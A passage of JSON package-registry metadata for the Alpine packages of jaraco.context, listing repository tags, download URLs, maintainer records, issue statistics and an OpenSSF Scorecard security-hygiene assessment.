raco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.582Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":14.250941315178945,"stargazers_count":31.718826682773983,"forks_count":31.50364302163162,"average":19.368352754896137},"purl":"pkg:apk/alpine/py3-jaraco.context-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context-pyc/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context-pyc/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":"bribbers@disroot.org","url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":3041,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2023-04-20T05:38:12.901Z","updated_at":"2023-04-20T05:38:12.901Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-edge","url":"https://pkgs.alpinelinux.org/packages?branch=edge","ecosystem":"alpine","default":false,"packages_count":39959,"maintainers_count":905,"namespaces_count":3,"keywords_count":6584,"github":"alpinelinux","metadata":{"repos":["main","community","testing"],"funded_packages_count":2944},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.616Z","updated_at":"2026-08-24T05:05:51.343Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/namespaces"}},{"id":6148369,"name":"py3-jaraco.context","ecosystem":"alpine","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2021-12-15T19:18:15.000Z","latest_release_published_at":"2021-12-15T19:18:15.000Z","latest_release_number":"4.1.1-r1","last_synced_at":"2026-03-20T13:06:08.073Z","created_at":"2023-01-31T23:12:06.436Z","updated_at":"2026-08-06T19:26:18.543Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.16/community/x86_64/py3-jaraco.context","install_command":"apk add py3-jaraco.context","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH